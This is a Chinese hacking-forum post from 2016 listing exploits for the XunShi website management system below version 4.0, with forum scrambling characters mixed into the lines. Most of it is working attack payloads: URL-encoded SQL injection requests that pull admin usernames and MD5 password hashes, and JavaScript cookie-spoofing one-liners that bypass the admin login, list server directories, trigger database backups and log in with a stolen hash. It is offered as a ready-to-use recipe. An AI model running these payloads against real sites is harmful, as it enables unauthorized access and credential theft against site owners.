中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入
: w1 m6 A  Y# Y. M, @# ~7 c7 ~1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
6 n: H3 @( A; f; _  V) J* J' r
6 w% \( s7 e! U% |' i2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
' _: m! t7 S% c+ J- r& \第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin0 d1 J2 _; C. S2 D8 I
可得到用户名和MD5加密码的密码。  `8 R3 M1 }' f9 }( f
' L; C  ^6 {( S
二、cookies欺骗# c2 Z, [: b0 `
1 Z, E+ s7 A4 U' Y6 ?
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. ' H- y1 x/ f1 w( x3 \) I
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
1 o1 K: m- n. v5 d' ?
( }4 \; m2 A, @8 K2、列目录. + R4 m) y- s. ?% @& o
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."* p  I' \! z2 C. y) o8 x; ^

; V% q5 W* w8 N( K3、数据库备份(适用性好像比较低.) * d. I" v( M; G7 q
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
+ ~2 s% ~; E, r# a8 r% c1 v3 F$ P9 f2 Y4 j( O! C$ x
4、得到MD5密码解不了密进后台方法3 s9 V6 L( v/ [& {+ h* V
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
7 C0 a  x5 l- |6 k0 |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2